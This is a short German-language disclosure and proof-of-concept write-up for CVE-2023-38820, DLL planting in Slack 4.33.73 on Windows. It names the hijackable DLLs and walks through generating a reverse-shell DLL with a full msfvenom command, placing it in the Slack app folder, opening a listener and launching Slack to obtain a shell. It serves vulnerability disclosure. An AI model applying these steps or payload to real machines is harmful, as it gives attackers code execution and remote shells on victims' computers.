DLL-Planting-Slack-4.33.73-CVE-2023-38820
DLL Planting in Slack 4.33.73 - CVE-2023-38820
Entdecker: Idan Malihi
Beschreibung
Ein Problem in Slack v.4.33.73 ermöglicht es einem lokalen Angreifer, beliebigen Code über den DLL-Lademechanismus in den Dateien profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll und RTWorkQ.DLL auszuführen.
Schritte zur Reproduktion
Um die Schwachstelle auszunutzen, sollte ein Angreifer das Slack-Programm herunterladen und installieren und die folgenden Schritte befolgen:
- Erstellen Sie eine schädliche DLL-Datei mit msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
- Übertragen Sie die schädliche DLL-Datei auf den Computer des Opfers
- Öffnen Sie den Slack-Pfad: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
- Übertragen Sie die schädliche DLL in den Slack-Pfad und benennen Sie sie für das Beispiel in "KBDUS.DLL" um.
- Öffnen Sie einen netcat- oder Metasploit-Listener
- Öffnen Sie Slack.exe
- Erhalten Sie eine Reverse Shell.